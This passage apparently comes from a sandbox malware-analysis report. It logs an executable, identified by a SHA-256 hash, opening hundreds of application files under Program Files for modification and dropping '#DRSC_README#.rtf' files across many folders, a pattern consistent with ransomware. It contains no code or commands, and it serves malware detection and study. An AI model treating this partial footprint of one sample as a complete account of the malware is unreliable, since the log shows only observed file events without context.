DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\next-arrow-disabled.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\java.policy 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\tr.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jvmti.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Review_RHP.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-default_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fill-sign-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\share_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jmc.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_email.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_CopyDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ro_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress-indeterminate.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\close.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\rt.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\meta-index 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\removed-files 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview_selected.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaTypewriterRegular.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\RHP_icons_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Security\BrowserCore\manifest.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\plugins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\spectrum_spinner.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\nb-no\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\management-agent.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dc_logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Close.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\inline-error-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_ellipses_selected-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\s_filter_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\chrome-ext-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-sampler.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher_1.3.0.v20140415-2008.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Scan_R_RHP.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\share.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\spectrum_spinner_process.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\hu_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_ru_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Protect_R_RHP.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\localedata.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\desktop-tool-view.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\security\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\welcome.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for 